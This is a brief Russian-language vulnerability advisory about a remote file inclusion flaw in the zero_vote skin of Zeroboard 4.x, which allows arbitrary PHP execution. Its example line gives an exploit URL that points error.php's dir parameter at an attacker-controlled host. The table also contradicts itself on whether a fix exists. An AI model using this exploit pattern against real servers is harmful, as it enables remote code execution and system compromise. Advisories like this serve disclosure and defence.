Удаленное выполнение произвольного PHP кода в Zeroboard
| Дата публикации: | 10.01.2005 |
| Всего просмотров: | 6078 |
| Опасность: | Высокая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2005-0380 CVE-2005-0495 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Zeroboard 4.x |
| Уязвимые версии: Zeroboard
Описание: Уязвимость в Zeroboard в zero_vote теме позволяет удаленному пользователю выполнить произвольные команды на целевой системе. Пример/Эксплоит: http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker] URL производителя: http://www.nzeo.com/?channel=zeroboard Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | New Vulnerability |